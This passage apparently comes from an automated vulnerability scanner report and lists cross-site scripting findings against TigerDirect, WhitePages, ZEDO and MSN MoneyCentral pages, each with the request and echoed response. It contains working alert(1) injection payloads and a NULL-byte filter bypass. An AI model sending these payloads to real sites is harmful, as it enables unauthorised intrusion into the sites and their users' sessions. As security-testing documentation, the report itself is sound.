Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /applications/SearchTools/item-details.asp?EdpNo=65323932ac78'%3balert(1)//e5661d759a9 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Sun, 01 Aug 2010 19:31:44 GMT
Pragma: no-cache
RTSS: 1
Date: Sun, 30 Jan 2011 17:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.tigerdirect.com
Set-Cookie: SSID=AwD7lykAAAAAbqRFTRovCwJupEVNAQBupEVNAAAAAAAAAABupEVNAQCWBwAAWnMAAAI; path=/; domain=.tigerdirect.com; expires=Mon, 30-Jan-2012 17:48:30 GMT
Set-Cookie: SSSC=91.G5568037306701131546.1.1942.29530; path=/; domain=.tigerdirect.com
Set-Cookie: SSRT=bqRFTQA; path=/; domain=.tigerdirect.com; expires=Mon, 30-Jan-2012 17:48:30 GMT
Set-Cookie: pop%5Fcheck=active; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Mon, 31-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&ItemDetailsBeta=Y&msProduct=1782427&msRandX=70; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D65323932ac78%27%253balert%281%29%2F%2Fe5661d759a9&Referer=; path=/
Set-Cookie: SessionId=3967579620110130124831173193214243; expires=Mon, 30-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Content-Length: 100872




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, newH
...[SNIP]...
</a>');
}

function ReviewSort(robj)
{
this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'65323932ac78';alert(1)//e5661d759a9'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart'
}

//The following 2 functions have to do with the In-store Avail popup div - case 61721
document.onclick = checkClickedElement;
function c
...[SNIP]...

5.342. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into an HTML comment. The payload %0010a05--><a>cede825acff was submitted in the EdpNo parameter. This input was echoed as 10a05--><a>cede825acff in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%0010a05--><a>cede825acff HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA04B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=19; path=/
Set-Cookie: SRVR=WEBX11%2D04B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%250010a05%2D%2D%3E%3Ca%3Ecede825acff&Referer=; path=/
Set-Cookie: SessionId=1384513520110129210427173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177796




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<a>cede825acff-->
...[SNIP]...

5.343. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 796d4'%3balert(1)//5a2dd2f7153 was submitted in the EdpNo parameter. This input was echoed as 796d4';alert(1)//5a2dd2f7153 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(1)//5a2dd2f7153 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01B
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=11; path=/
Set-Cookie: SRVR=WEBX10%2D01B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%281%29%2F%2F5a2dd2f7153&Referer=; path=/
Set-Cookie: SessionId=959419320110129210424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100869




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
</a>');
}

function ReviewSort(robj)
{
this.location ='/applications/searchtools/item-details.asp?EdpNo=' +'6532393796d4';alert(1)//5a2dd2f7153'+ '&RSort=' +robj.value+ '&csid=ITD&body=#ReviewStart'
}

//The following 2 functions have to do with the In-store Avail popup div - case 61721
document.onclick = checkClickedElement;
function c
...[SNIP]...

5.344. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload %00bb0c0--><a>d595b8102fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb0c0--><a>d595b8102fc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /applications/SearchTools/item-details.asp?%00bb0c0--><a>d595b8102fc=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100803
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:24 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&ItemDetailsBeta=Y&msProduct=1782427&msRandX=83; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500bb0c0%2D%2D%3E%3Ca%3Ed595b8102fc%3D1&Referer=; path=/
Set-Cookie: SessionId=4668577920110129202424173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<a>d595b8102fc=1-->
...[SNIP]...

5.345. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb8c3"><a>a3bb50b2646 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb8c3"><a>a3bb50b2646 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /applications/SearchTools/item-details.asp?%00eb8c3"><a>a3bb50b2646=1 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150A%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150A%2Ejpg&ItemDetailsBeta=Y&msProduct=335878&msRandX=32; path=/
Set-Cookie: SRVR=WEBX12%2D12B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3F%2500eb8c3%22%3E%3Ca%3Ea3bb50b2646%3D1&Referer=; path=/
Set-Cookie: SessionId=2063113720110129202415173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 100801




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&%00eb8c3"><a>a3bb50b2646=1">
...[SNIP]...

5.346. http://msn.whitepages.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://msn.whitepages.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb03c</script><script>alert(1)</script>39657643a5f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=eb03c</script><script>alert(1)</script>39657643a5f

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37 (Unix) mod_perl/1.30
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:50:27 GMT
Connection: close
Set-Cookie: wpn_persistent=max_utype%3Ddefault%26PID%3DTUSnw6wQAEsAADcXd1Q%26times_seen_invite%3D%26filled_demo_survey%3D%26wp_stage%3Dproduction%26persistent_search_count%3D%26had_successful_search%3D; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.whitepages.com
Set-Cookie: wpn_session=xps_5070%3D%26wp_stage%3Dproduction%26type%3Ddefault%26session_search_count%3D; path=/; domain=.whitepages.com
Content-Length: 34688

            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...

...[SNIP]...

5.347. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a183e--><script>alert(1)</script>a0c510cb4bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a183e--><script>alert(1)</script>a0c510cb4bc

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 19:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=34; path=/
Set-Cookie: SRVR=WEBX12%2D12B; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%26beta%3DY&Referer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Da183e%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea0c510cb4bc&PHRoutine=10; path=/
Set-Cookie: SRCCODE=WEBGOOSFS; expires=Tue, 01-Mar-2011 05:00:00 GMT; path=/
Set-Cookie: SessionId=2135320220110130141555173193214243; expires=Mon, 30-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 192373




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...
<script>alert(1)</script>a0c510cb4bc-->
...[SNIP]...

5.348. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d02c"-alert(1)-"1076a141a3e was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=253
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:31 GMT
Connection: close
Content-Length: 2403

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzCus
...[SNIP]...

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e';

var zzhasAd=undefined;

var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~0104115d02c"-alert(1)-"1076a141a3e;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

5.355. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7e3a"-alert(1)-"37913713bab was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=136
Expires: Sun, 30 Jan 2011 01:46:01 GMT
Date: Sun, 30 Jan 2011 01:43:45 GMT
Connection: close
Content-Length: 3457

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
);}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab';

var zzhasAd=undefined;

var zzStr = "s=2;u=INmz6woBADYAAHrQ5V4AAACH~010411b7e3a"-alert(1)-"37913713bab;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

5.356. http://redacted/home.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/home.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edfff"><script>alert(1)</script>c74f635b791 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /home.asp?edfff"><script>alert(1)</script>c74f635b791=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
